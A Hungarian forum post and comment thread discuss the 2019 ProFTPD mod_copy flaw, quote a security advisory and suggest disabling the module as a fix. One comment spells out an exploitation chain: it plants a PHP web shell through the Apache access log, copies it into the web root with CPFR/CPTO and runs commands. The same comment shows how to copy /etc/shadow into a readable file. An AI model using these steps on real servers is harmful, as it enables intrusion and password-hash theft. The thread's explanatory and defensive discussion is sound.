ProFTPD remote code execution without authentication

 ( toMpEr | 2019. július 23., kedd - 14:14 )

All ProFTPd versions up to and including 1.3.6 (the latest version released in 2017) are impacted by the vulnerability which enables remote attackers to execute arbitrary code without the need to authenticate and with the user rights of the ProFTPD service after successful exploitation.

"mod_copy is supplied in the default installation of ProFTPd and is enabled by default in most distributions (e.g. Debian)," according to Mädel's description of the incorrect access control bug. "Issuing CPFR, CPTO commands to a ProFTPd server allows users without write permissions to copy any file on the FTP server,"

According to ProFTPd's bug tracker, the issue is present because "the mod_copy module's custom SITE CPFR and SITE CPTO commands do not honor and configurations as expected."

Server admins who want to prevent potential attacks should immediately disable the mod_copy module in the ProFTPd configuration file as a workaround.

https://www.securityweek.com/proftpd-vulnerability-can-expose-servers-attacks

A shodan 6,202 proftpd szervert indexel jelenleg idehaza.

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

ha jol ertem csak fajlt tud copyzni, nincs remote code exec. kihagytam valamit?

--
A vegtelen ciklus is vegeter egyszer, csak kelloen eros hardver kell hozza!

Jogos, de hivatalosan ez már RCE-nek számít, mert nem nehéz azt csinálni belőle:

$ nc any.site 80
GET /<?php system($_GET['cmd']);?>
...
CPFR /var/log/apache2/access.log 
CPTO /var/www/html/hello.php
..
$ wget http://any.site/hellp.php?cmd=whoami

vagy fájl olvasás:

CPFR /etc/shadow
CPTO /etc/proftpd/welcome.msg

(valószínű vannak ennél kreatívabb módszerek is, csak hirtelen ez jutott eszembe)

"Server admins who want to prevent potential attacks should immediately disable the mod_copy module in the ProFTPd configuration file as a workaround."
CopyEngine off?

Valószínű elegendő vagy /etc/proftpd/modules.conf -ben kicommentelni a "LoadModule mod_copy.c" sort